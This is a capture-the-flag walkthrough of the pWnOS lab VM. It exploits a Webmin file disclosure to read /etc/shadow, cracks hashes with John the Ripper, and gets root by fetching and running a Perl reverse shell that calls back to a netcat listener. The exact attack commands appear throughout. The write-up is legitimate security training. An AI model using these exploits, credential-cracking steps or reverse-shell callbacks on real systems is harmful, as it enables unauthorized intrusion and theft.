• VM: pWnOS
  • Goal: acquire root access
  • Approach: solve without automated exploitation tools

Network IP address fix for VMware

If the VM does not obtain an IP address automatically, do the following to fix it:

  • Reset the root password
  • log in to Holynix as root
  • run command: rm /etc/udev/rules.d/70-persistent-net.rules
  • reboot Holynix: shutdown -r 0

After doing this, the VM should obtain an IP address correctly. Note: if you want to keep the original root password, record the root entry in the /etc/shadow file right before changing the root password and put it back after the procedure is completed.

Enumeration

Target Discovery

First, locate the IP address of the target:

nmap -n -sn 192.168.172.200-
Target: 192.168.172.214

Port scanning

nmap -p- -A 192.168.172.214
TCP: 22 OpenSSH 4.6p1 Debian 5build1
TCP: 80 Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
TCP: 139 Samba smbd 3.X – 4.X (workgroup: MSHOME)
TCP: 445 Samba smbd 3.0.26a (workgroup: MSHOME)
TCP: 10000 MiniServ 0.01 (Webmin httpd)

Check out the website


There isn't much on the website. Following the Next button and filling in some info only gets you some taunting. lol


Check out Webmin site


The page shows a login form for Webmin. I try some SQL injection tests and it is not vulnerable, so I turn to searchsploit to check for any known vulnerabilities in Webmin.

searchsploit webmin

There is an Arbitrary File Disclosure exploit that may be helpful. I try out 1997.php.

Exploitation

Webmin: Arbitrary File Disclosure

cp /usr/share/exploitdb/exploits/multiple/remote/1997.php .
php -f 1997.php 192.168.172.214 10000 http /etc/passwd

Awesome. I am able to retrieve the file /etc/passwd. Then I try to retrieve /etc/shadow, which also succeeds, and obtain the password hashes for the five accounts (root, vmware, obama, osama and yomama).


Password cracking

Let's crack the passwords using John the Ripper:

Step 1: Combine passwd & shadow

I save the passwd and shadow files as pwnos-passwd and pwnos-shadow respectively and use the unshadow command to combine them into one file:

unshadow pwnos-passwd pwnos-shadow > pwnos-hash

Step 2: Perform a dictionary attack using John the Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt pwnos-hash

We crack the password for user vmware: h4ckm3. We can now log in using SSH.
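The unshadow step from Step 1, re-implemented as an added Python example (not part of the original post and not the John the Ripper tool itself): it merges constructed passwd and shadow lines the way unshadow does, and additionally drops locked accounts whose password field is `*` or `!`, since those give a dictionary attack nothing to test. All usernames and hashes in the sample are constructed placeholders, not values from the VM.

```python
# Added example (not from the original post): a minimal re-implementation of the
# unshadow merge. All passwd/shadow lines and hashes below are constructed samples.

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$1$constructed$ROOTHASHPLACEHOLDER000:18164:0:99999:7:::
daemon:*:14041:0:99999:7:::
vmware:$1$constructed$VMWAREHASHPLACEHOLDER0:14042:0:99999:7:::
"""


def parse_shadow(text: str) -> dict:
    """Map username -> password field (second field) of each shadow entry."""
    hashes = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and not line.startswith("#"):
            hashes[fields[0]] = fields[1]
    return hashes


def unshadow(passwd_text: str, shadow_text: str) -> list:
    """Replace the 'x' password field of each passwd entry with the shadow hash,
    which is what the unshadow tool does so a cracker sees user and hash together."""
    hashes = parse_shadow(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue  # blank or malformed passwd entry
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def crackable(merged: list) -> list:
    """Keep only entries whose password field is a real hash. Locked or disabled
    accounts ('*', '!', '!!', empty) give a dictionary attack nothing to test."""
    return [l for l in merged if l.split(":")[1] and l.split(":")[1][0] not in "*!"]
```

Feeding only the `crackable()` entries to a cracker avoids wasting time on system accounts; conversely, an account that unexpectedly shows up in that list on a production host is worth a look.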

SSH Login

ssh -l vmware 192.168.172.214

Privilege Escalation

Webmin uses Perl scripts with a .cgi extension. The Webmin exploit we used takes advantage of an LFI (Local File Inclusion) vulnerability. Typically, when a file with the same script extension (in this case .cgi) is retrieved through the web server, the script is executed and its output is returned instead of the actual content of the script.

So we can upload a Perl reverse shell script and use the Webmin exploit again to try to execute it. First get a copy of the Perl reverse shell, update the IP address and port (192.168.172.110:4000), and set up a web server on the Kali box:

cp /usr/share/webshells/perl/perl-reverse-shell.pl rshell.cgi
nano rshell.cgi
python -m SimpleHTTPServer 80

Then download the .cgi file to the target machine:

cd /tmp
wget http://192.168.172.110/rshell.cgi
chmod 755 rshell.cgi

Set up a Netcat listener on the Kali box:

nc -lp 4000

Finally, in another Kali terminal:

php -f 1997.php 192.168.172.214 10000 http /tmp/rshell.cgi

Root access obtained!

Thank you to the author of pWnOS for the box.
